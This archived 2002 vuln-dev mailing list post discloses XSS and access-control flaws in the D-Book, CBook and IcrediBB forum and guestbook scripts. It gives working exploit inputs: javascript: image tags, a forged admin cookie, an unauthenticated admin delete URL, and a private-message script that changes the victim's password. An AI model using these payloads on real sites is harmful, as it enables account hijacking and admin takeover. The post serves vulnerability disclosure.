Security holes : D-Book, CBook, IcrediBB

From: frog frog (leseulfrog@hotmail.com)
Date: 04/12/02


Date: 12 Apr 2002 12:09:53 -0000
From: frog frog <leseulfrog@hotmail.com>
To: vuln-dev@securityfocus.com


('binary' encoding is not supported, stored as-is)

Product 1 :
D-Book
http://www.smartbb.net

Versions :
1.4 (and less ?)

Problems :
- XSS
- Admin access

Exploits :
- [img=javascript:alert(%27hum%27)]
- Cookie "logged,anyvalue" on admin.php

More details in french :
http://www.ifrance.com/kitetoua/tuto/D-Book.txt

translated by Google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FD-
Book.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools

****************************************
Product 2 :
CBook

Versions :
1.0.1 beta

Problems :
- XSS
- Access to an admin function (delete all entries)

Exploits :
- &lt;script&gt;ANYSCRIPT&lt;/script&gt; on profil
- http://www.site.com/index.php?Change=2

More details in french :
http://www.ifrance.com/kitetoua/tuto/Cbook.txt

translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FCbook.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools

***********************************************
Product 3:
IcrediBB Bulletin Board System
http://www.icredibb.com

Versions :
1.1 beta

Problems :
- Access to users/admins account
- XSS

Exploits :
- To change password, in a private message :
<sc*ript>
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
window.open('index.php?function=logout');
window.open('usercp.php?
function=changepass&newpassword=PASS&passve
rify=PASS&submitnewpass=Submit');
</s*cript>
(without '*')

- In subject (private message) :
&lt;script&gt;ANYSCRIPT&lt;/script&gt;

- In webbrowser :

/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:alert('hello')
&message=MESSAGE&submitpm=Submit PM

/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:window.open('http:%2F%2Fwww.url.com')
&message=MESSAGE&submitpm=Submit PM

/pm.php?
function=sendpm&to=VICTIM&subject=SUBJECT&im
ages=
javascript:a='http:%2F%2Fwww.url.com'%
3Bwindow.open(a)%
3B&message=MESSAGE&submitpm=Submit PM

- In /usercp.php?function=avataroptions :
javascript:alert(%27HeLLo%27)

More details in french :
http://www.ifrance.com/kitetoua/tuto/icrediBB.txt

translated by google :
http://translate.google.com/translate?u=http%3A%
2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FicrediBB.txt&langpair=fr%7Cen&hl=fr&prev=%
2Flanguage_tools

**************************************************

frog-m@n



Relevant Pages

  • Security holes in ForamiX
    ... ('binary' encoding is not supported, ... Admin access ... More details in french: ... translated by google: ...
    (Vuln-Dev)
  • Chirac unveils his grand plan to restore French pride
    ... The French president, Jacques Chirac, yesterday unveiled what he hopes ... European search engine to rival Google. ... funding for a series of innovative grands projets, ...
    (soc.culture.thai)
  • Re: Google books (was: Some refs to New England)
    ... I prefer the French interface) ... http://bibnum2.banq.qc.ca/bna/numtextes/accueil.htm (in French) ... I usually make a search with google. ... I go directly to nosracines or canadiana because the ...
    (soc.genealogy.medieval)
  • Re: Error "Prop Res Dll Not Loaded" Problem - How can I fix this?!
    ... Searching via Google using the string "propres.dll" is not a very good idea ... and the reason you are getting pages in languages other than english (like ... french) is that "propres" is actually a word in French (which I believe means ...
    (microsoft.public.word.application.errors)
  • Re: The Future of Young Adult Fiction?
    ... My current insane writing exercise is trying to translate an 18th ... century French novel into English (well, as much as I can unless/until I ... It would be less fun if Google weren't so bad at it. ...
    (rec.arts.sf.composition)